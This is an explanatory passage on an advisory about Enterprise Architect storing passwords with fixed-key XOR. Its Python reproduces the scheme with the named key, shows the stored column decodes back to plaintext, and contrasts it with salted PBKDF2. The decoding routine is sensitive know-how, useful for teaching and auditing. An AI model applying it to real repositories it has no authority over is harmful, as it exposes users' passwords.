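The advisory's point is that XOR with a fixed key is reversible and unsalted, so it is not a substitute for a password hash. As an added example (not code from Sparx Systems or the advisory), the Python below reproduces the scheme as described, demonstrates the two properties that make it unsuitable (applying it twice returns the password; identical passwords yield identical stored values), and contrasts it with a salted PBKDF2 record that verifies correctly but cannot be inverted. Assumptions: the 12-byte key repeats for longer passwords, and the column holds the raw XOR bytes (the advisory does not state the storage encoding); the iteration count is a demo value.

```python
"""Fixed-key XOR obfuscation versus a salted password hash.

Added example, not Enterprise Architect code. Key repetition and raw-byte
storage are assumptions; the advisory only names the key.
"""
import hashlib
import hmac
import os
from itertools import cycle

# The key named in the advisory.
XOR_KEY = b"E17030402158"


def xor_with_key(data):
    """XOR data against the repeating key. Symmetric: apply twice to undo."""
    return bytes(b ^ k for b, k in zip(data, cycle(XOR_KEY)))


def xor_obfuscate(password):
    """Reproduce the stored 'Password' column under the assumed scheme."""
    return xor_with_key(password.encode("utf-8"))


def uses_weak_scheme(password, stored):
    """Audit helper: does a known account's stored column match the XOR
    scheme? A match means the repository still relies on obfuscation."""
    return hmac.compare_digest(xor_obfuscate(password), stored)


def pbkdf2_store(password, iterations=100_000, salt=None):
    """Create a salted PBKDF2-HMAC-SHA256 record (salt drawn fresh per user)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt, "iterations": iterations, "hash": digest}


def pbkdf2_verify(password, record):
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 record["salt"], record["iterations"])
    return hmac.compare_digest(digest, record["hash"])


def same_password_same_storage(scheme, password):
    """True if storing the same password twice yields identical bytes,
    which lets anyone with table access spot shared passwords."""
    first, second = scheme(password), scheme(password)
    if isinstance(first, dict):
        first, second = first["hash"], second["hash"]
    return first == second


if __name__ == "__main__":
    pw = "Secret1!"
    stored = xor_obfuscate(pw)
    print("xor stored bytes      :", stored.hex())
    print("xor applied twice     :", xor_with_key(stored))
    print("xor leaks reuse       :", same_password_same_storage(xor_obfuscate, pw))
    print("pbkdf2 leaks reuse    :", same_password_same_storage(pbkdf2_store, pw))
    print("pbkdf2 verify correct :", pbkdf2_verify(pw, pbkdf2_store(pw)))
```

Running it shows the asymmetry: the XOR column decodes back to the plaintext with the same function and repeats byte-for-byte for equal passwords, while two PBKDF2 records for the same password differ (fresh salt) yet both verify. The uses_weak_scheme helper is what an auditor would run against a single known test account to confirm whether a repository is still on the obfuscated format.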
